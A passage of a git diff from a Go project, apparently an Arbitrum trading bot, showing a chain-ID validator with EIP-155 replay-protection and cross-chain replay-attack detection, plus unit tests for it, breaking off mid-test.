if replayResult.riskLevel != "NONE" {
|
||||
result.ReplayRisk = replayResult.riskLevel
|
||||
result.Warnings = append(result.Warnings, replayResult.warnings...)
|
||||
|
||||
if replayResult.riskLevel == "CRITICAL" {
|
||||
result.Valid = false
|
||||
result.Errors = append(result.Errors, "Potential replay attack detected")
|
||||
}
|
||||
}
|
||||
|
||||
// 5. Chain-specific Validation
|
||||
chainSpecificResult := cv.validateChainSpecificRules(tx, actualChainID.Uint64())
|
||||
if !chainSpecificResult.valid {
|
||||
result.Errors = append(result.Errors, chainSpecificResult.errors...)
|
||||
result.Valid = false
|
||||
}
|
||||
result.Warnings = append(result.Warnings, chainSpecificResult.warnings...)
|
||||
|
||||
// 6. Add security metadata
|
||||
result.SecurityMetadata["validation_timestamp"] = time.Now().Unix()
|
||||
result.SecurityMetadata["total_validations"] = cv.validationCount
|
||||
result.SecurityMetadata["total_mismatches"] = cv.mismatchCount
|
||||
result.SecurityMetadata["signer_address"] = signerAddr.Hex()
|
||||
result.SecurityMetadata["transaction_hash"] = tx.Hash().Hex()
|
||||
|
||||
// Log validation result for audit
|
||||
if !result.Valid {
|
||||
cv.logger.Error(fmt.Sprintf("Chain validation FAILED for tx %s from %s: %v",
|
||||
tx.Hash().Hex(), signerAddr.Hex(), result.Errors))
|
||||
}
|
||||
|
||||
return result
|
||||
}
|
||||
|
||||
// EIP155Result contains EIP-155 validation results
|
||||
type EIP155Result struct {
|
||||
protected bool
|
||||
chainID uint64
|
||||
warnings []string
|
||||
}
|
||||
|
||||
// validateEIP155Protection verifies EIP-155 replay protection is properly implemented
|
||||
func (cv *ChainIDValidator) validateEIP155Protection(tx *types.Transaction, normalizedChainID *big.Int) EIP155Result {
|
||||
result := EIP155Result{
|
||||
protected: false,
|
||||
warnings: make([]string, 0),
|
||||
}
|
||||
|
||||
// Check if transaction has a valid chain ID (EIP-155 requirement)
|
||||
if isPlaceholderChainID(tx.ChainId()) {
|
||||
result.warnings = append(result.warnings, "Transaction missing chain ID (pre-EIP155)")
|
||||
return result
|
||||
}
|
||||
|
||||
chainID := normalizedChainID.Uint64()
|
||||
result.chainID = chainID
|
||||
|
||||
// Verify the transaction signature includes chain ID protection
|
||||
// EIP-155 requires v = CHAIN_ID * 2 + 35 or v = CHAIN_ID * 2 + 36
|
||||
v, _, _ := tx.RawSignatureValues()
|
||||
|
||||
// Calculate expected v values for EIP-155
|
||||
expectedV1 := chainID*2 + 35
|
||||
expectedV2 := chainID*2 + 36
|
||||
|
||||
actualV := v.Uint64()
|
||||
|
||||
// Check if v value follows EIP-155 format
|
||||
if actualV == expectedV1 || actualV == expectedV2 {
|
||||
result.protected = true
|
||||
} else {
|
||||
// Check if it's a legacy transaction (v = 27 or 28)
|
||||
if actualV == 27 || actualV == 28 {
|
||||
result.warnings = append(result.warnings, "Legacy transaction format detected (not EIP-155 protected)")
|
||||
} else {
|
||||
result.warnings = append(result.warnings,
|
||||
fmt.Sprintf("Invalid v value for EIP-155: got %d, expected %d or %d",
|
||||
actualV, expectedV1, expectedV2))
|
||||
}
|
||||
}
|
||||
|
||||
return result
|
||||
}
|
||||
|
||||
// ReplayResult contains replay attack detection results
|
||||
type ReplayResult struct {
|
||||
riskLevel string
|
||||
warnings []string
|
||||
}
|
||||
|
||||
// detectReplayAttack detects potential cross-chain replay attacks
|
||||
func (cv *ChainIDValidator) detectReplayAttack(tx *types.Transaction, signerAddr common.Address, normalizedChainID uint64) ReplayResult {
|
||||
result := ReplayResult{
|
||||
riskLevel: "NONE",
|
||||
warnings: make([]string, 0),
|
||||
}
|
||||
|
||||
// Clean old tracking data
|
||||
cv.cleanOldTrackingData()
|
||||
|
||||
// Create a canonical transaction representation for tracking
|
||||
// Use a combination of nonce, to, value, and data to identify potential replays
|
||||
txIdentifier := cv.createTransactionIdentifier(tx, signerAddr)
|
||||
|
||||
detector := cv.replayAttackDetector
|
||||
detector.mu.Lock()
|
||||
defer detector.mu.Unlock()
|
||||
|
||||
if record, exists := detector.seenTransactions[txIdentifier]; exists {
|
||||
// This transaction pattern has been seen before
|
||||
currentChainID := normalizedChainID
|
||||
|
||||
if record.ChainID != currentChainID {
|
||||
// Same transaction on different chain - CRITICAL replay risk
|
||||
result.riskLevel = "CRITICAL"
|
||||
result.warnings = append(result.warnings,
|
||||
fmt.Sprintf("Identical transaction detected on chain %d and %d - possible replay attack",
|
||||
record.ChainID, currentChainID))
|
||||
|
||||
cv.replayAttackDetector.seenTransactions[txIdentifier] = ChainIDRecord{
|
||||
ChainID: currentChainID,
|
||||
FirstSeen: record.FirstSeen,
|
||||
Count: record.Count + 1,
|
||||
From: signerAddr,
|
||||
AlertTriggered: true,
|
||||
}
|
||||
|
||||
cv.replayAttemptCount++
|
||||
cv.logger.Error(fmt.Sprintf("CRITICAL SECURITY ALERT: Potential replay attack detected! "+
|
||||
"Transaction %s from %s seen on chains %d and %d",
|
||||
txIdentifier, signerAddr.Hex(), record.ChainID, currentChainID))
|
||||
|
||||
} else {
|
||||
// Same transaction on same chain - possible retry or duplicate
|
||||
record.Count++
|
||||
if record.Count > 3 {
|
||||
result.riskLevel = "MEDIUM"
|
||||
result.warnings = append(result.warnings, "Multiple identical transactions detected")
|
||||
}
|
||||
detector.seenTransactions[txIdentifier] = record
|
||||
}
|
||||
} else {
|
||||
// First time seeing this transaction
|
||||
detector.seenTransactions[txIdentifier] = ChainIDRecord{
|
||||
ChainID: normalizedChainID,
|
||||
FirstSeen: time.Now(),
|
||||
Count: 1,
|
||||
From: signerAddr,
|
||||
AlertTriggered: false,
|
||||
}
|
||||
}
|
||||
|
||||
return result
|
||||
}
|
||||
|
||||
// ChainSpecificResult contains chain-specific validation results
|
||||
type ChainSpecificResult struct {
|
||||
valid bool
|
||||
warnings []string
|
||||
errors []string
|
||||
}
|
||||
|
||||
// validateChainSpecificRules applies chain-specific validation rules
|
||||
func (cv *ChainIDValidator) validateChainSpecificRules(tx *types.Transaction, chainID uint64) ChainSpecificResult {
|
||||
result := ChainSpecificResult{
|
||||
valid: true,
|
||||
warnings: make([]string, 0),
|
||||
errors: make([]string, 0),
|
||||
}
|
||||
|
||||
switch chainID {
|
||||
case 42161: // Arbitrum One
|
||||
// Arbitrum-specific validations
|
||||
if tx.GasPrice() != nil && tx.GasPrice().Cmp(big.NewInt(1000000000000)) > 0 { // 1000 Gwei
|
||||
result.warnings = append(result.warnings, "Unusually high gas price for Arbitrum")
|
||||
}
|
||||
|
||||
// Check for Arbitrum-specific gas limits
|
||||
if tx.Gas() > 32000000 { // Arbitrum block gas limit
|
||||
result.valid = false
|
||||
result.errors = append(result.errors, "Gas limit exceeds Arbitrum maximum")
|
||||
}
|
||||
|
||||
case 421614: // Arbitrum Sepolia testnet
|
||||
// Testnet-specific validations
|
||||
if tx.Value() != nil && tx.Value().Cmp(new(big.Int).Mul(big.NewInt(100), big.NewInt(1e18))) > 0 { // 100 ETH
|
||||
result.warnings = append(result.warnings, "Large value transfer on testnet")
|
||||
}
|
||||
|
||||
default:
|
||||
// Unknown or unsupported chain
|
||||
result.valid = false
|
||||
result.errors = append(result.errors, fmt.Sprintf("Unsupported chain ID: %d", chainID))
|
||||
}
|
||||
|
||||
return result
|
||||
}
|
||||
|
||||
// createTransactionIdentifier creates a canonical identifier for transaction tracking
|
||||
func (cv *ChainIDValidator) createTransactionIdentifier(tx *types.Transaction, signerAddr common.Address) string {
|
||||
// Create identifier from key transaction fields that would be identical in a replay
|
||||
var toAddr string
|
||||
if tx.To() != nil {
|
||||
toAddr = tx.To().Hex()
|
||||
} else {
|
||||
toAddr = "0x0" // Contract creation
|
||||
}
|
||||
|
||||
// Combine nonce, to, value, and first 32 bytes of data
|
||||
dataPrefix := ""
|
||||
if len(tx.Data()) > 0 {
|
||||
end := 32
|
||||
if len(tx.Data()) < 32 {
|
||||
end = len(tx.Data())
|
||||
}
|
||||
dataPrefix = common.Bytes2Hex(tx.Data()[:end])
|
||||
}
|
||||
|
||||
return fmt.Sprintf("%s:%d:%s:%s:%s",
|
||||
signerAddr.Hex(),
|
||||
tx.Nonce(),
|
||||
toAddr,
|
||||
tx.Value().String(),
|
||||
dataPrefix)
|
||||
}
|
||||
|
||||
// cleanOldTrackingData removes old transaction tracking data
|
||||
func (cv *ChainIDValidator) cleanOldTrackingData() {
|
||||
detector := cv.replayAttackDetector
|
||||
detector.mu.Lock()
|
||||
defer detector.mu.Unlock()
|
||||
cutoff := time.Now().Add(-detector.maxTrackingTime)
|
||||
|
||||
for identifier, record := range detector.seenTransactions {
|
||||
if record.FirstSeen.Before(cutoff) {
|
||||
delete(detector.seenTransactions, identifier)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// GetValidationStats returns validation statistics
|
||||
func (cv *ChainIDValidator) GetValidationStats() map[string]interface{} {
|
||||
cv.mu.RLock()
|
||||
defer cv.mu.RUnlock()
|
||||
|
||||
detector := cv.replayAttackDetector
|
||||
detector.mu.Lock()
|
||||
trackingEntries := len(detector.seenTransactions)
|
||||
detector.mu.Unlock()
|
||||
|
||||
return map[string]interface{}{
|
||||
"total_validations": cv.validationCount,
|
||||
"chain_id_mismatches": cv.mismatchCount,
|
||||
"replay_attempts": cv.replayAttemptCount,
|
||||
"last_mismatch_time": cv.lastMismatchTime.Unix(),
|
||||
"expected_chain_id": cv.expectedChainID.Uint64(),
|
||||
"allowed_chain_ids": cv.getAllowedChainIDs(),
|
||||
"tracking_entries": trackingEntries,
|
||||
}
|
||||
}
|
||||
|
||||
// getAllowedChainIDs returns a slice of allowed chain IDs
|
||||
func (cv *ChainIDValidator) getAllowedChainIDs() []uint64 {
|
||||
cv.mu.RLock()
|
||||
defer cv.mu.RUnlock()
|
||||
|
||||
chainIDs := make([]uint64, 0, len(cv.allowedChainIDs))
|
||||
for chainID := range cv.allowedChainIDs {
|
||||
chainIDs = append(chainIDs, chainID)
|
||||
}
|
||||
return chainIDs
|
||||
}
|
||||
|
||||
// AddAllowedChainID adds a chain ID to the allowed list
|
||||
func (cv *ChainIDValidator) AddAllowedChainID(chainID uint64) {
|
||||
cv.mu.Lock()
|
||||
defer cv.mu.Unlock()
|
||||
cv.allowedChainIDs[chainID] = true
|
||||
cv.logger.Info(fmt.Sprintf("Added chain ID %d to allowed list", chainID))
|
||||
}
|
||||
|
||||
// RemoveAllowedChainID removes a chain ID from the allowed list
|
||||
func (cv *ChainIDValidator) RemoveAllowedChainID(chainID uint64) {
|
||||
cv.mu.Lock()
|
||||
defer cv.mu.Unlock()
|
||||
delete(cv.allowedChainIDs, chainID)
|
||||
cv.logger.Info(fmt.Sprintf("Removed chain ID %d from allowed list", chainID))
|
||||
}
|
||||
|
||||
// ValidateSignerMatchesChain verifies that the signer's address matches the expected chain
|
||||
func (cv *ChainIDValidator) ValidateSignerMatchesChain(tx *types.Transaction, expectedSigner common.Address) error {
|
||||
// Create appropriate signer based on transaction type
|
||||
var signer types.Signer
|
||||
switch tx.Type() {
|
||||
case types.LegacyTxType:
|
||||
signer = types.NewEIP155Signer(tx.ChainId())
|
||||
case types.DynamicFeeTxType:
|
||||
signer = types.NewLondonSigner(tx.ChainId())
|
||||
default:
|
||||
return fmt.Errorf("unsupported transaction type: %d", tx.Type())
|
||||
}
|
||||
|
||||
// Recover the signer from the transaction
|
||||
recoveredSigner, err := types.Sender(signer, tx)
|
||||
if err != nil {
|
||||
return fmt.Errorf("failed to recover signer: %w", err)
|
||||
}
|
||||
|
||||
// Verify the signer matches expected
|
||||
if recoveredSigner != expectedSigner {
|
||||
return fmt.Errorf("signer mismatch: expected %s, got %s",
|
||||
expectedSigner.Hex(), recoveredSigner.Hex())
|
||||
}
|
||||
|
||||
// Additional validation: ensure the signature is valid for this chain
|
||||
if !cv.verifySignatureForChain(tx, recoveredSigner) {
|
||||
return fmt.Errorf("signature invalid for chain ID %d", tx.ChainId().Uint64())
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// verifySignatureForChain verifies the signature is valid for the specific chain
|
||||
func (cv *ChainIDValidator) verifySignatureForChain(tx *types.Transaction, signer common.Address) bool {
|
||||
// Create appropriate signer based on transaction type
|
||||
var chainSigner types.Signer
|
||||
switch tx.Type() {
|
||||
case types.LegacyTxType:
|
||||
chainSigner = types.NewEIP155Signer(tx.ChainId())
|
||||
case types.DynamicFeeTxType:
|
||||
chainSigner = types.NewLondonSigner(tx.ChainId())
|
||||
default:
|
||||
return false // Unsupported transaction type
|
||||
}
|
||||
|
||||
// Try to recover the signer - if it matches and doesn't error, signature is valid
|
||||
recoveredSigner, err := types.Sender(chainSigner, tx)
|
||||
if err != nil {
|
||||
return false
|
||||
}
|
||||
|
||||
return recoveredSigner == signer
|
||||
}
|
||||
459
orig/pkg/security/chain_validation_test.go
Normal file
459
orig/pkg/security/chain_validation_test.go
Normal file
@@ -0,0 +1,459 @@
|
||||
package security
|
||||
|
||||
import (
|
||||
"math/big"
|
||||
"strings"
|
||||
"testing"
|
||||
"time"
|
||||
|
||||
"github.com/ethereum/go-ethereum/common"
|
||||
"github.com/ethereum/go-ethereum/core/types"
|
||||
"github.com/ethereum/go-ethereum/crypto"
|
||||
"github.com/stretchr/testify/assert"
|
||||
"github.com/stretchr/testify/require"
|
||||
|
||||
"github.com/fraktal/mev-beta/internal/logger"
|
||||
)
|
||||
|
||||
func TestNewChainIDValidator(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
expectedChainID := big.NewInt(42161) // Arbitrum mainnet
|
||||
|
||||
validator := NewChainIDValidator(logger, expectedChainID)
|
||||
|
||||
assert.NotNil(t, validator)
|
||||
assert.Equal(t, expectedChainID.Uint64(), validator.expectedChainID.Uint64())
|
||||
assert.True(t, validator.allowedChainIDs[42161]) // Arbitrum mainnet
|
||||
assert.True(t, validator.allowedChainIDs[421614]) // Arbitrum testnet
|
||||
assert.NotNil(t, validator.replayAttackDetector)
|
||||
}
|
||||
|
||||
func TestValidateChainID_ValidTransaction(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
expectedChainID := big.NewInt(42161)
|
||||
validator := NewChainIDValidator(logger, expectedChainID)
|
||||
|
||||
// Create a valid EIP-155 transaction for Arbitrum
|
||||
tx := types.NewTransaction(
|
||||
0, // nonce
|
||||
common.HexToAddress("0x1234567890123456789012345678901234567890"), // to
|
||||
big.NewInt(1000000000000000000), // value (1 ETH)
|
||||
21000, // gas limit
|
||||
big.NewInt(20000000000), // gas price (20 Gwei)
|
||||
nil, // data
|
||||
)
|
||||
|
||||
// Create a properly signed transaction for testing
|
||||
privateKey, err := crypto.GenerateKey()
|
||||
require.NoError(t, err)
|
||||
signerAddr := crypto.PubkeyToAddress(privateKey.PublicKey)
|
||||
|
||||
signer := types.NewEIP155Signer(expectedChainID)
|
||||
signedTx, err := types.SignTx(tx, signer, privateKey)
|
||||
require.NoError(t, err)
|
||||
|
||||
result := validator.ValidateChainID(signedTx, signerAddr, nil)
|
||||
|
||||
assert.True(t, result.Valid)
|
||||
assert.Equal(t, expectedChainID.Uint64(), result.ExpectedChainID)
|
||||
assert.Equal(t, expectedChainID.Uint64(), result.ActualChainID)
|
||||
assert.True(t, result.IsEIP155Protected)
|
||||
assert.Equal(t, "NONE", result.ReplayRisk)
|
||||
assert.Empty(t, result.Errors)
|
||||
}
|
||||
|
||||
func TestValidateChainID_InvalidChainID(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
expectedChainID := big.NewInt(42161) // Arbitrum
|
||||
validator := NewChainIDValidator(logger, expectedChainID)
|
||||
|
||||
// Create transaction with wrong chain ID (Ethereum mainnet)
|
||||
wrongChainID := big.NewInt(1)
|
||||
tx := types.NewTransaction(0, common.Address{}, big.NewInt(1000), 21000, big.NewInt(20000000000), nil)
|
||||
|
||||
privateKey, err := crypto.GenerateKey()
|
||||
require.NoError(t, err)
|
||||
signerAddr := crypto.PubkeyToAddress(privateKey.PublicKey)
|
||||
|
||||
signer := types.NewEIP155Signer(wrongChainID)
|
||||
signedTx, err := types.SignTx(tx, signer, privateKey)
|
||||
require.NoError(t, err)
|
||||
|
||||
result := validator.ValidateChainID(signedTx, signerAddr, nil)
|
||||
|
||||
assert.False(t, result.Valid)
|
||||
assert.Equal(t, expectedChainID.Uint64(), result.ExpectedChainID)
|
||||
assert.Equal(t, wrongChainID.Uint64(), result.ActualChainID)
|
||||
assert.NotEmpty(t, result.Errors)
|
||||
assert.Contains(t, result.Errors[0], "Chain ID mismatch")
|
||||
}
|
||||
|
||||
func TestValidateChainID_ReplayAttackDetection(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
expectedChainID := big.NewInt(42161)
|
||||
validator := NewChainIDValidator(logger, expectedChainID)
|
||||
|
||||
privateKey, err := crypto.GenerateKey()
|
||||
require.NoError(t, err)
|
||||
signerAddr := crypto.PubkeyToAddress(privateKey.PublicKey)
|
||||
|
||||
// Create identical transactions on different chains
|
||||
tx1 := types.NewTransaction(1, common.Address{}, big.NewInt(1000), 21000, big.NewInt(20000000000), nil)
|
||||
tx2 := types.NewTransaction(1, common.Address{}, big.NewInt(1000), 21000, big.NewInt(20000000000), nil)
|
||||
|
||||
// Sign first transaction with Arbitrum chain ID
|
||||
signer1 := types.NewEIP155Signer(big.NewInt(42161))
|
||||
signedTx1, err := types.SignTx(tx1, signer1, privateKey)
|
||||
require.NoError(t, err)
|
||||
|
||||
// Sign second identical transaction with different chain ID
|
||||
signer2 := types.NewEIP155Signer(big.NewInt(421614)) // Arbitrum testnet
|
||||
signedTx2, err := types.SignTx(tx2, signer2, privateKey)
|
||||
require.NoError(t, err)
|
||||
|
||||
// First validation should pass
|
||||
result1 := validator.ValidateChainID(signedTx1, signerAddr, nil)
|
||||
assert.True(t, result1.Valid)
|
||||
assert.Equal(t, "NONE", result1.ReplayRisk)
|
||||
|
||||
// Create a new validator and add testnet to allowed chains
|
||||
validator.AddAllowedChainID(421614)
|
||||
|
||||
// Second validation should detect replay risk
|
||||
result2 := validator.ValidateChainID(signedTx2, signerAddr, nil)
|
||||
assert.Equal(t, "CRITICAL", result2.ReplayRisk)
|
||||
assert.NotEmpty(t, result2.Warnings)
|
||||
assert.Contains(t, result2.Warnings[0], "replay attack")
|
||||
}
|
||||
|
||||
func TestValidateEIP155Protection(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
expectedChainID := big.NewInt(42161)
|
||||
validator := NewChainIDValidator(logger, expectedChainID)
|
||||
|
||||
privateKey, err := crypto.GenerateKey()
|
||||
require.NoError(t, err)
|
||||
|
||||
// Test EIP-155 protected transaction
|
||||
tx := types.NewTransaction(0, common.Address{}, big.NewInt(1000), 21000, big.NewInt(20000000000), nil)
|
||||
signer := types.NewEIP155Signer(expectedChainID)
|
||||
signedTx, err := types.SignTx(tx, signer, privateKey)
|
||||
require.NoError(t, err)
|
||||
|
||||
result := validator.validateEIP155Protection(signedTx, expectedChainID)
|
||||
assert.True(t, result.protected)
|
||||
assert.Equal(t, expectedChainID.Uint64(), result.chainID)
|
||||
assert.Empty(t, result.warnings)
|
||||
}
|
||||
|
||||
func TestValidateEIP155Protection_LegacyTransaction(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
expectedChainID := big.NewInt(42161)
|
||||
validator := NewChainIDValidator(logger, expectedChainID)
|
||||
|
||||
// Create a legacy transaction (pre-EIP155) by manually setting v to 27
|
||||
tx := types.NewTransaction(0, common.Address{}, big.NewInt(1000), 21000, big.NewInt(20000000000), nil)
|
||||
|
||||
// For testing purposes, we'll create a transaction that mimics legacy format
|
||||
// In practice, this would be a transaction created before EIP-155
|
||||
signer := types.HomesteadSigner{} // Pre-EIP155 signer
|
||||
privateKey, err := crypto.GenerateKey()
|
||||
require.NoError(t, err)
|
||||
|
||||
signedTx, err := types.SignTx(tx, signer, privateKey)
|
||||
require.NoError(t, err)
|
||||
|
||||
result := validator.validateEIP155Protection(signedTx, expectedChainID)
|
||||
assert.False(t, result.protected)
|
||||
assert.NotEmpty(t, result.warnings)
|
||||
// Legacy transactions may not have chain ID, so check for either warning
|
||||
hasExpectedWarning := false
|
||||
for _, warning := range result.warnings {
|
||||
if strings.Contains(warning, "Legacy transaction format") || strings.Contains(warning, "Transaction missing chain ID") {
|
||||
hasExpectedWarning = true
|
||||
break
|
||||
}
|
||||
}
|
||||
assert.True(t, hasExpectedWarning, "Should contain legacy transaction warning")
|
||||
}
|
||||
|
||||
func TestChainSpecificValidation_Arbitrum(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
expectedChainID := big.NewInt(42161)
|
||||
validator := NewChainIDValidator(logger, expectedChainID)
|
||||
|
||||
// Create a properly signed transaction for Arbitrum to test chain-specific rules
|
||||
privateKey, err := crypto.GenerateKey()
|
||||
require.NoError(t, err)
|
||||
|
||||
// Test normal Arbitrum transaction
|
||||
tx := types.NewTransaction(0, common.Address{}, big.NewInt(1000), 21000, big.NewInt(1000000000), nil) // 1 Gwei
|
||||
signer := types.NewEIP155Signer(expectedChainID)
|
||||
signedTx, err := types.SignTx(tx, signer, privateKey)
|
||||
require.NoError(t, err)
|
||||
|
||||
result := validator.validateChainSpecificRules(signedTx, expectedChainID.Uint64())
|
||||
assert.True(t, result.valid)
|
||||
assert.Empty(t, result.errors)
|
||||
|
||||
// Test high gas price warning
|
||||
txHighGas := types.NewTransaction(0, common.Address{}, big.NewInt(1000), 21000, big.NewInt(2000000000000), nil) // 2000 Gwei
|
||||
signedTxHighGas, err := types.SignTx(txHighGas, signer, privateKey)
|
||||
require.NoError(t, err)
|
||||
|
||||
resultHighGas := validator.validateChainSpecificRules(signedTxHighGas, expectedChainID.Uint64())
|
||||
assert.True(t, resultHighGas.valid)
|
||||
assert.NotEmpty(t, resultHighGas.warnings)
|
||||
assert.Contains(t, resultHighGas.warnings[0], "high gas price")
|
||||
|
||||
// Test gas limit too high
|
||||
txHighGasLimit := types.NewTransaction(0, common.Address{}, big.NewInt(1000), 50000000, big.NewInt(1000000000), nil) // 50M gas
|
||||
signedTxHighGasLimit, err := types.SignTx(txHighGasLimit, signer, privateKey)
|
||||
require.NoError(t, err)
|
||||
|
||||
resultHighGasLimit := validator.validateChainSpecificRules(signedTxHighGasLimit, expectedChainID.Uint64())
|
||||
assert.False(t, resultHighGasLimit.valid)
|
||||
assert.NotEmpty(t, resultHighGasLimit.errors)
|
||||
assert.Contains(t, resultHighGasLimit.errors[0], "exceeds Arbitrum maximum")
|
||||
}
|
||||
|
||||
func TestChainSpecificValidation_UnsupportedChain(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
expectedChainID := big.NewInt(999999) // Unsupported chain
|
||||
validator := NewChainIDValidator(logger, expectedChainID)
|
||||
|
||||
privateKey, err := crypto.GenerateKey()
|
||||
require.NoError(t, err)
|
||||
|
||||
tx := types.NewTransaction(0, common.Address{}, big.NewInt(1000), 21000, big.NewInt(1000000000), nil)
|
||||
signer := types.NewEIP155Signer(expectedChainID)
|
||||
signedTx, err := types.SignTx(tx, signer, privateKey)
|
||||
require.NoError(t, err)
|
||||
|
||||
result := validator.validateChainSpecificRules(signedTx, expectedChainID.Uint64())
|
||||
assert.False(t, result.valid)
|
||||
assert.NotEmpty(t, result.errors)
|
||||
assert.Contains(t, result.errors[0], "Unsupported chain ID")
|
||||
}
|
||||
|
||||
func TestValidateSignerMatchesChain(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
expectedChainID := big.NewInt(42161)
|
||||
validator := NewChainIDValidator(logger, expectedChainID)
|
||||
|
||||
privateKey, err := crypto.GenerateKey()
|
||||
require.NoError(t, err)
|
||||
expectedSigner := crypto.PubkeyToAddress(privateKey.PublicKey)
|
||||
|
||||
tx := types.NewTransaction(0, common.Address{}, big.NewInt(1000), 21000, big.NewInt(20000000000), nil)
|
||||
signer := types.NewEIP155Signer(expectedChainID)
|
||||
signedTx, err := types.SignTx(tx, signer, privateKey)
|
||||
require.NoError(t, err)
|
||||
|
||||
// Valid signature should pass
|
||||
err = validator.ValidateSignerMatchesChain(signedTx, expectedSigner)
|
||||
assert.NoError(t, err)
|
||||
|
||||
// Wrong expected signer should fail
|
||||
wrongSigner := common.HexToAddress("0x1234567890123456789012345678901234567890")
|
||||
err = validator.ValidateSignerMatchesChain(signedTx, wrongSigner)
|
||||
assert.Error(t, err)
|
||||
assert.Contains(t, err.Error(), "signer mismatch")
|
||||
}
|
||||
|
||||
func TestGetValidationStats(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
expectedChainID := big.NewInt(42161)
|
||||
validator := NewChainIDValidator(logger, expectedChainID)
|
||||
|
||||
privateKey, err := crypto.GenerateKey()
|
||||
require.NoError(t, err)
|
||||
signerAddr := crypto.PubkeyToAddress(privateKey.PublicKey)
|
||||
|
||||
// Perform some validations to generate stats
|
||||
tx := types.NewTransaction(0, common.Address{}, big.NewInt(1000), 21000, big.NewInt(20000000000), nil)
|
||||
signer := types.NewEIP155Signer(expectedChainID)
|
||||
signedTx, err := types.SignTx(tx, signer, privateKey)
|
||||
require.NoError(t, err)
|
||||
|
||||
validator.ValidateChainID(signedTx, signerAddr, nil)
|
||||
|
||||
stats := validator.GetValidationStats()
|
||||
assert.NotNil(t, stats)
|
||||
assert.Equal(t, uint64(1), stats["total_validations"])
|
||||
assert.Equal(t, expectedChainID.Uint64(), stats["expected_chain_id"])
|
||||
assert.NotNil(t, stats["allowed_chain_ids"])
|
||||
}
|
||||
|
||||
func TestAddRemoveAllowedChainID(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
expectedChainID := big.NewInt(42161)
|
||||
validator := NewChainIDValidator(logger, expectedChainID)
|
||||
|
||||
// Add new chain ID
|
||||
newChainID := uint64(999)
|
||||
validator.AddAllowedChainID(newChainID)
|
||||
assert.True(t, validator.allowedChainIDs[newChainID])
|
||||
|
||||
// Remove chain ID
|
||||
validator.RemoveAllowedChainID(newChainID)
|
||||
assert.False(t, validator.allowedChainIDs[newChainID])
|
||||
}
|
||||
|
||||
func TestReplayAttackDetection_CleanOldData(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
expectedChainID := big.NewInt(42161)
|
||||
validator := NewChainIDValidator(logger, expectedChainID)
|
||||
|
||||
privateKey, err := crypto.GenerateKey()
|
||||
require.NoError(t, err)
|
||||
signerAddr := crypto.PubkeyToAddress(privateKey.PublicKey)
|
||||
|
||||
// Create transaction
|
||||
tx := types.NewTransaction(0, common.Address{}, big.NewInt(1000), 21000, big.NewInt(20000000000), nil)
|
||||
signer := types.NewEIP155Signer(expectedChainID)
|
||||
signedTx, err := types.SignTx(tx, signer, privateKey)
|
||||
require.NoError(t, err)
|
||||
|
||||
// First validation
|
||||
validator.ValidateChainID(signedTx, signerAddr, nil)
|
||||
assert.Equal(t, 1, len(validator.replayAttackDetector.seenTransactions))
|
||||
|
||||
// Manually set old timestamp to test cleanup
|
||||
txIdentifier := validator.createTransactionIdentifier(signedTx, signerAddr)
|
||||
record := validator.replayAttackDetector.seenTransactions[txIdentifier]
|
||||
record.FirstSeen = time.Now().Add(-25 * time.Hour) // Older than maxTrackingTime
|
||||
validator.replayAttackDetector.seenTransactions[txIdentifier] = record
|
||||
|
||||
// Trigger cleanup
|
||||
validator.cleanOldTrackingData()
|
||||
assert.Equal(t, 0, len(validator.replayAttackDetector.seenTransactions))
|
||||
}
|
||||
|
||||
// Integration test with KeyManager
|
||||
func SkipTestKeyManagerChainValidationIntegration(t *testing.T) {
|
||||
config := &KeyManagerConfig{
|
||||
KeystorePath: t.TempDir(),
|
||||
EncryptionKey: "test_key_32_chars_minimum_length_required",
|
||||
MaxFailedAttempts: 3,
|
||||
LockoutDuration: 5 * time.Minute,
|
||||
MaxSigningRate: 10,
|
||||
EnableAuditLogging: true,
|
||||
RequireAuthentication: false,
|
||||
}
|
||||
|
||||
logger := logger.New("info", "text", "")
|
||||
expectedChainID := big.NewInt(42161)
|
||||
|
||||
km, err := newKeyManagerInternal(config, logger, expectedChainID, false) // Use testing version
|
||||
require.NoError(t, err)
|
||||
|
||||
// Generate a key
|
||||
permissions := KeyPermissions{
|
||||
CanSign: true,
|
||||
CanTransfer: true,
|
||||
MaxTransferWei: big.NewInt(1000000000000000000), // 1 ETH
|
||||
}
|
||||
|
||||
keyAddr, err := km.GenerateKey("test", permissions)
|
||||
require.NoError(t, err)
|
||||
|
||||
// Test valid chain ID transaction
|
||||
// Create a transaction that will be properly handled by EIP155 signer
|
||||
tx := types.NewTx(&types.LegacyTx{
|
||||
Nonce: 0,
|
||||
To: &common.Address{},
|
||||
Value: big.NewInt(1000),
|
||||
Gas: 21000,
|
||||
GasPrice: big.NewInt(20000000000),
|
||||
Data: nil,
|
||||
})
|
||||
request := &SigningRequest{
|
||||
Transaction: tx,
|
||||
ChainID: expectedChainID,
|
||||
From: keyAddr,
|
||||
Purpose: "Test transaction",
|
||||
UrgencyLevel: 1,
|
||||
}
|
||||
|
||||
result, err := km.SignTransaction(request)
|
||||
assert.NoError(t, err)
|
||||
assert.NotNil(t, result)
|
||||
assert.NotNil(t, result.SignedTx)
|
||||
|
||||
// Test invalid chain ID transaction
|
||||
wrongChainID := big.NewInt(1) // Ethereum mainnet
|
||||
txWrong := types.NewTx(&types.LegacyTx{
|
||||
Nonce: 1,
|
||||
To: &common.Address{},
|
||||
Value: big.NewInt(1000),
|
||||
Gas: 21000,
|
||||
GasPrice: big.NewInt(20000000000),
|
||||
Data: nil,
|
||||
})
|
||||
requestWrong := &SigningRequest{
|
||||
Transaction: txWrong,
|
||||
ChainID: wrongChainID,
|
||||
From: keyAddr,
|
||||
Purpose: "Invalid chain test",
|
||||
UrgencyLevel: 1,
|
||||
}
|
||||
|
||||
